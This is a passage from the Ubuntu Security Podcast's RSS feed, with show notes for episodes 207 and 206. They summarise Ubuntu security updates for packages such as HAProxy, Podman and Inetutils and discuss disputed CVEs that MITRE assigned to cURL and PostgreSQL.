<h3 id="usn-6310-1-json-c-vulnerability--09-41">[<a href="https://ubuntu.com/security/notices/USN-6310-1">USN-6310-1</a>] json-c vulnerability (09:41)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-32292">CVE-2021-32292</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>stack buffer overread on crafted input - interestingly the CVE says that it
can allow code execution but that is the first time I have heard an OOB read
can allow code execution</li>
</ul>
<h3 id="usn-6313-1-faad2-vulnerabilities--10-08">[<a href="https://ubuntu.com/security/notices/USN-6313-1">USN-6313-1</a>] FAAD2 vulnerabilities (10:08)</h3>
<ul>
<li>8 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-32276">CVE-2021-32276</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38858">CVE-2023-38858</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38857">CVE-2023-38857</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32278">CVE-2021-32278</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32277">CVE-2021-32277</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32274">CVE-2021-32274</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32273">CVE-2021-32273</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32272">CVE-2021-32272</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>audio decoding library</li>
<li>various heap and stack buffer overflows plus a NULL ptr deref for good measure</li>
</ul>
<h3 id="usn-6319-1-amd-microcode-vulnerability--10-33">[<a href="https://ubuntu.com/security/notices/USN-6319-1">USN-6319-1</a>] AMD Microcode vulnerability (10:33)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-20569">CVE-2023-20569</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>&ldquo;INCEPTION&rdquo; / &ldquo;RAS Poisoning&rdquo; - similar to the original SpectreV2 vulns -
another variant of a speculative execution attack using the branch prediction
buffer to cause an incorrectly speculated return to be executed which can then
be inferred from a cache timing attack to read kernel memory</li>
</ul>
<h3 id="usn-6320-1-firefox-vulnerabilities--11-13">[<a href="https://ubuntu.com/security/notices/USN-6320-1">USN-6320-1</a>] Firefox vulnerabilities (11:13)</h3>
<ul>
<li>11 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4580">CVE-2023-4580</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4579">CVE-2023-4579</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4577">CVE-2023-4577</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4585">CVE-2023-4585</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4584">CVE-2023-4584</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4583">CVE-2023-4583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4581">CVE-2023-4581</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4578">CVE-2023-4578</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4575">CVE-2023-4575</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4574">CVE-2023-4574</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4573">CVE-2023-4573</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>117.0</li>
</ul>
<h3 id="usn-6263-2-openjdk-regression--11-24">[<a href="https://ubuntu.com/security/notices/USN-6263-2">USN-6263-2</a>] OpenJDK regression (11:24)</h3>
<ul>
<li>7 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-25193">CVE-2023-25193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22049">CVE-2023-22049</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22045">CVE-2023-22045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22044">CVE-2023-22044</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22041">CVE-2023-22041</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22036">CVE-2023-22036</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22006">CVE-2023-22006</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-204/#usn-6263-1-openjdk-vulnerabilities">[USN-6263-1] OpenJDK vulnerabilities from Episode 204</a></li>
<li>Upstream regression in handling of JAR files made with older versions of Ant
etc - would fail to be decompressed</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="reports-of-fake-cves-being-assigned-by-mitre--12-07">Reports of &ldquo;Fake&rdquo; CVEs being assigned by MITRE (12:07)</h3>
<ul>
<li><a href="https://riskybiznews.substack.com/p/open-source-projects-plagued-by-fake-cves">https://riskybiznews.substack.com/p/open-source-projects-plagued-by-fake-cves</a></li>
<li>Dan Lorenc from Chainguard posted about a heap of CVEs assigned just over 1
week ago (22nd August 2023) against a heap of open source projects - cURL,
PostgreSQL, Python, nasm, ImageMagick and a heap more</li>
<li>Each refers to either a bug report or patch sent to the upstream project that
mentions a fix for seemingly real vulnerability (&ldquo;buffer overflow&rdquo;, &ldquo;use after
free&rdquo; etc)</li>
<li>But for most of these, the upstream project never agreed that these were valid
vulnerabilities, and some have come out to expressly disavow them - <a href="https://www.postgresql.org/about/news/cve-2020-21469-is-not-a-security-vulnerability-2701/">PostgreSQL
on CVE-2020-21469</a> and <a href="https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-everything-that-is-wrong-with-cves/">cURL on CVE-2020-19909</a>
<ul>
<li>PostgreSQL issue is a DoS via sending a repeated SIGHUP to the server
<ul>
<li>BUT you need to have local access with priviliges to send SIGHUP - ie be
root - and have access to the PostgreSQL superuser etc</li>
<li>which if you do, you can do a lot more damage - ie. this is not a
vulnerability - there is no privilege boundary being crossed etc</li>
</ul>
</li>
<li>cURL is an integer overflow in the <code>--retry-delay</code> command-line option - where
if you specify a really large value of seconds, cURL will multiply this by
1000 to convert it to ms and hence overflow
<ul>
<li>BUT this is not used for memory calculations etc - is just used for a
retry delay - ie. it will only wait for say a few seconds rather than the
billion odd seconds originally specified - again, there is no security
impact here</li>
</ul>
</li>
</ul>
</li>
<li>Dan posited that these were likely just scraped automatically and CVEs filed</li>
<li>But who filed the CVEs?
<ul>
<li>all show as assigned by MITRE - and anyone can request a CVE from MITRE as
they are the CNA of last resort - <a href="https://cveform.mitre.org/">https://cveform.mitre.org/</a></li>
<li>BUT like all CNAs, they should be checking validating the information before
assigning a CVE</li>
<li>MITRE even rejected the request by Daniel Stenberg (@bagder) (cURL
maintainer) to reject the CVE</li>
<li>clearly something is breaking down here</li>
</ul>
</li>
<li>Not only does this create a heap of work for the upstream projects (as
mentioned by Risky Biz) but for all the downstreams like Ubuntu and other
distros
<ul>
<li>We have to triage these CVEs against the packages in Ubuntu and determine
whether the require immediate fixing etc - this takes time for everyone
involved</li>
</ul>
</li>
<li>RiskyBiz calls these &ldquo;Fake&rdquo; CVEs - but they are not fake in the traditional
sense - ie. they are not fradualent, they have been issued by the official
custodians of CVEs - MITRE - but it is just that they are not actual
vulnerabilities</li>
<li>Is this just taking the Linux kernel mantra of <a href="https://lkml.iu.edu/hypermail/linux/kernel/1711.2/01701.html">security problems are just bugs</a>
(and hence to get kernel security fixes you need to get all kernel bug fixes
as you won&rsquo;t know which are the real vulns) to the opposite extreme - all bugs
are security bugs and hence should get CVEs?</li>
<li>Will have to wait and see how this plays out but if consumers can&rsquo;t trust CVEs
that will likely put the whole system in jeopardy since whilst CVEs have many
shortcomings, they are the global defacto for vulnerability tracking</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E207.mp3" length="37982419" type="audio/mpeg" /><itunes:duration>1338</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 206
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-206/</link>
          <pubDate>Fri, 25 Aug 2023 18:47:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>b2134cea38806e6611840eeff7da92e0e42403ea1f6ddec6fbbfd13b8d8907ec1f1dfaf3c6cb8c90cc605807c18cec72d5078101581e3ba9da3b841b62882113</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 206</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we talk about HTTP Content-Length handling, intricacies of group
  management in container environments and making sure you check your return codes
  while covering vulns in HAProxy, Podman, Inetutils and more, plus we put a call...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we talk about HTTP Content-Length handling, intricacies of group
  management in container environments and making sure you check your return codes
  while covering vulns in HAProxy, Podman, Inetutils and more, plus we put a call
  out for input on using open source tools to secure your SDLC.
  </itunes:summary>
        <description>  This week we talk about HTTP Content-Length handling, intricacies of group
  management in container environments and making sure you check your return codes
  while covering vulns in HAProxy, Podman, Inetutils and more, plus we put a call
  out for input on using open source tools to secure your SDLC.
  </description>
        <googleplay:description>  This week we talk about HTTP Content-Length handling, intricacies of group
  management in container environments and making sure you check your return codes
  while covering vulns in HAProxy, Podman, Inetutils and more, plus we put a call
  out for input on using open source tools to secure your SDLC.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we talk about HTTP Content-Length handling, intricacies of group
management in container environments and making sure you check your return codes
while covering vulns in HAProxy, Podman, Inetutils and more, plus we put a call
out for input on using open source tools to secure your SDLC.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>69 unique CVEs addressed</p>
<h3 id="usn-6294-1-usn-6294-2-haproxy-vulnerability--01-00">[<a href="https://ubuntu.com/security/notices/USN-6294-1">USN-6294-1</a>, <a href="https://ubuntu.com/security/notices/USN-6294-2">USN-6294-2</a>] HAProxy vulnerability (01:00)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-40225">CVE-2023-40225</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Would forward requests with empty <code>Content-Length</code> headers even when there was
content in the request (which violates
<a href="https://www.rfc-editor.org/rfc/rfc9110">RFC 9110 - HTTP Semantics</a>) - this
RFC explicitly says:</li>
</ul>
<blockquote>
<p>If the message is forwarded by a downstream intermediary, a Content-Length
field value that is inconsistent with the received message framing might cause
a security failure due to request smuggling or response splitting. As a result,
a sender MUST NOT forward a message with a Content-Length header field value
that is known to be incorrect.</p>
</blockquote>
<ul>
<li>As such, downstream HTTP/1 servers behind HAProxy may interpret the payload in
the request as an extra request and hence this can be used for request
smuggling as warned by the RFC</li>
</ul>
<h3 id="usn-6295-1-podman-vulnerability--02-34">[<a href="https://ubuntu.com/security/notices/USN-6295-1">USN-6295-1</a>] Podman vulnerability (02:34)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2989">CVE-2022-2989</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://www.benthamsgaze.org/2022/08/22/vulnerability-in-linux-containers-investigation-and-mitigation/">https://www.benthamsgaze.org/2022/08/22/vulnerability-in-linux-containers-investigation-and-mitigation/</a></li>
<li>interaction between supplemental groups, negative group permissions and setgid
binaries</li>
<li>supplemental groups - each user generally has a group specific to their user
(so-called primary group for that user), but can also belong to other
supplemental groups:</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>ubuntu@ubuntu:~$ groups
</span></span><span style="display:flex;"><span>ubuntu sudo
</span></span></code></pre></div><ul>
<li>negative group permissions - not used often but allows to say that a certain
group of users should not be able to access something - ie. denylisting</li>
<li>setgid binary - like a setuid binary - no matter what group that executes the
binary, the binary runs as the primary group of the binary</li>
<li>so could a user could create a binary, make it set-group for one of their
supplemental groups and then drop their primary group, run it and use that to
access such a resource that has been denied access to their primary group?
<ul>
<li>no, since on login, primary group gets added to the list of supplemental
groups which can&rsquo;t be modified by a user themself - this has been the
standard behaviour in UNIX since 1994 in BSD 4.4 and hence Linux has always
worked this way too</li>
</ul>
</li>
<li>However, podman is a container manager though and it manages groups within the
container - and it failed to do this duplication of the primary group into the
supplemental group and so would allow exactly this attack
<ul>
<li>it wasn&rsquo;t only podman that was affected - also <a href="https://ubuntu.com/security/CVE-2022-2990">buildah</a>, <a href="https://ubuntu.com/security/CVE-2022-2995">cri-o</a> and <a href="https://ubuntu.com/security/CVE-2022-36109">moby</a>
(ie. docker.io in Ubuntu)</li>
</ul>
</li>
</ul>
<h3 id="usn-6296-1-postgresql-vulnerabilities--06-44">[<a href="https://ubuntu.com/security/notices/USN-6296-1">USN-6296-1</a>] PostgreSQL vulnerabilities (06:44)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-39418">CVE-2023-39418</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39417">CVE-2023-39417</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream point releases, so contains both security fixes and other bug
fixes</li>
</ul>
<h3 id="usn-6298-1-zziplib-vulnerabilities--07-04">[<a href="https://ubuntu.com/security/notices/USN-6298-1">USN-6298-1</a>] ZZIPlib vulnerabilities (07:04)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-18442">CVE-2020-18442</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7727">CVE-2018-7727</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Provides the ability to read into a zip archive, as well as the ability to
overlay a zip archive with an existing file system</li>
<li>Used by applications like mpd, milkytracker and texlive (LaTeX etc)</li>
<li>Two different DoS
<ul>
<li>infinite loop -&gt; CPU based DoS</li>
<li>memory leak -&gt; resource based DoS</li>
<li>both require to parse an attacker provided ZIP archive</li>
</ul>
</li>
</ul>
<h3 id="usn-6297-1-ghostscript-vulnerability--07-50">[<a href="https://ubuntu.com/security/notices/USN-6297-1">USN-6297-1</a>] Ghostscript vulnerability (07:50)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38559">CVE-2023-38559</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Buffer overflow when generating a PDF file for a DEVN device - DEVN is an
abbreviation for DeviceN which is a type of colour space - ie a way of
specifying different colour levels across a set of channels - ie. encoding
colour information for a printer etc</li>
<li>Needs an attacker to provide a crafted input file though&hellip;</li>
</ul>
<h3 id="usn-6299-1-poppler-vulnerabilities--08-40">[<a href="https://ubuntu.com/security/notices/USN-6299-1">USN-6299-1</a>] poppler vulnerabilities (08:40)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-36024">CVE-2020-36024</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36023">CVE-2020-36023</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>someone has been fuzzing poppler - in particular the <code>pdftops</code> binary</li>
<li>stack overflow and NULL ptr deref when handling crafted input PDFs -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-6300-1-linux-kernel-vulnerabilities--09-18">[<a href="https://ubuntu.com/security/notices/USN-6300-1">USN-6300-1</a>] Linux kernel vulnerabilities (09:18)</h3>
<ul>
<li>24 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35829">CVE-2023-35829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35828">CVE-2023-35828</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35824">CVE-2023-35824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35823">CVE-2023-35823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-33288">CVE-2023-33288</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-33203">CVE-2023-33203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3268">CVE-2023-3268</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32248">CVE-2023-32248</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3141">CVE-2023-3141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30772">CVE-2023-30772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28466">CVE-2023-28466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23004">CVE-2023-23004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2269">CVE-2023-2269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2235">CVE-2023-2235</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2194">CVE-2023-2194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2163">CVE-2023-2163</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2124">CVE-2023-2124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2002">CVE-2023-2002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1990">CVE-2023-1990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1855">CVE-2023-1855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1611">CVE-2023-1611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0597">CVE-2023-0597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48502">CVE-2022-48502</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4269">CVE-2022-4269</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 GA, AWS, GCP, IBM, Intel-IoTG, KVM, Low latency, NVIDIA, Raspi etc</li>
<li>Have mentioned some of these previously - issues across various drivers and subsystems
<ul>
<li>Lots of UAFs, a few OOB / NULL ptr deref, memory leak (DoS), OOB read /
write as well</li>
</ul>
</li>
</ul>
<h3 id="usn-6301-1-linux-kernel-vulnerabilities--10-07">[<a href="https://ubuntu.com/security/notices/USN-6301-1">USN-6301-1</a>] Linux kernel vulnerabilities (10:07)</h3>
<ul>
<li>16 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-33203">CVE-2023-33203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3141">CVE-2023-3141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3111">CVE-2023-3111</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30772">CVE-2023-30772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28466">CVE-2023-28466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2194">CVE-2023-2194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2124">CVE-2023-2124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1990">CVE-2023-1990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1855">CVE-2023-1855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1611">CVE-2023-1611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0590">CVE-2023-0590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4269">CVE-2022-4269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1184">CVE-2022-1184</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0168">CVE-2022-0168</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36691">CVE-2020-36691</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 Xilinx ZynqMP on 20.04 (Hi Portia!)
<ul>
<li>HWE / OEM etc on 18.04 ESM</li>
</ul>
</li>
<li>Very similar sorts of issues as above</li>
</ul>
<h3 id="usn-6267-3-firefox-regressions--10-44">[<a href="https://ubuntu.com/security/notices/USN-6267-3">USN-6267-3</a>] Firefox regressions (10:44)</h3>
<ul>
<li>12 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4050">CVE-2023-4050</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4046">CVE-2023-4046</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4045">CVE-2023-4045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4058">CVE-2023-4058</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4057">CVE-2023-4057</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4056">CVE-2023-4056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4055">CVE-2023-4055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4053">CVE-2023-4053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4051">CVE-2023-4051</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4049">CVE-2023-4049</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4048">CVE-2023-4048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4047">CVE-2023-4047</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Second lot of regressions in the upstream 116 release - now at 116.0.3
<ul>
<li>often these regressions are for Windows users etc but this time we have one
for Linux - in particular screensharing on Wayland was broken since would
fail to properly negotiate framerate in webrtc with Pipewire</li>
</ul>
</li>
</ul>
<h3 id="usn-6302-1-vim-vulnerabilities--11-22">[<a href="https://ubuntu.com/security/notices/USN-6302-1">USN-6302-1</a>] Vim vulnerabilities (11:22)</h3>
<ul>
<li>15 CVEs addressed in Trusty ESM (14.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3153">CVE-2022-3153</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3099">CVE-2022-3099</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3037">CVE-2022-3037</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3016">CVE-2022-3016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2874">CVE-2022-2874</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2816">CVE-2022-2816</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2598">CVE-2022-2598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3134">CVE-2022-3134</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2982">CVE-2022-2982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2889">CVE-2022-2889</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2862">CVE-2022-2862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2819">CVE-2022-2819</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2817">CVE-2022-2817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2580">CVE-2022-2580</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2522">CVE-2022-2522</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>More vim - is now the 8th most mentioned package in this podcast (only behind
Linux kernel, Firefox, Thunderbird, PHP, MySQL, WebkitGTK)</li>
</ul>
<h3 id="usn-6303-1-usn-6303-2-clamav-vulnerability--11-50">[<a href="https://ubuntu.com/security/notices/USN-6303-1">USN-6303-1</a>, <a href="https://ubuntu.com/security/notices/USN-6303-2">USN-6303-2</a>] ClamAV vulnerability (11:50)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-20197">CVE-2023-20197</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Infinite loop in the HFS+ parser -&gt; DoS of entire ClamAV</li>
</ul>
<h3 id="usn-6304-1-inetutils-vulnerabilities--12-14">[<a href="https://ubuntu.com/security/notices/USN-6304-1">USN-6304-1</a>] Inetutils vulnerabilities (12:14)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-40303">CVE-2023-40303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39028">CVE-2022-39028</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Provides various utilities for different network services - ie. clients /
servers for ftp, telnet, and talk</li>
<li>NULL ptr deref in telnetd - not super interesting - if running telnetd you
probably have bigger problems</li>
<li>Failed to check return values of the various <code>setuid()=/=setgid()</code> system calls
used in ftpd/rshd/rlogin etc
<ul>
<li>daemon runs as root and uses these calls to drop privileges to the user who
is logging in - if these fail, then users session will still be running as
root - easy privesc (although not really able to be controlled by the remote
attacker to induce this error to occur)</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="brainstorming-for-a-software-security-workshop--13-53">Brainstorming for a software security workshop (13:53)</h3>
<ul>
<li><a href="https://discourse.ubuntu.com/t/brainstorming-for-a-software-security-workshop/37991/1">https://discourse.ubuntu.com/t/brainstorming-for-a-software-security-workshop/37991/1</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
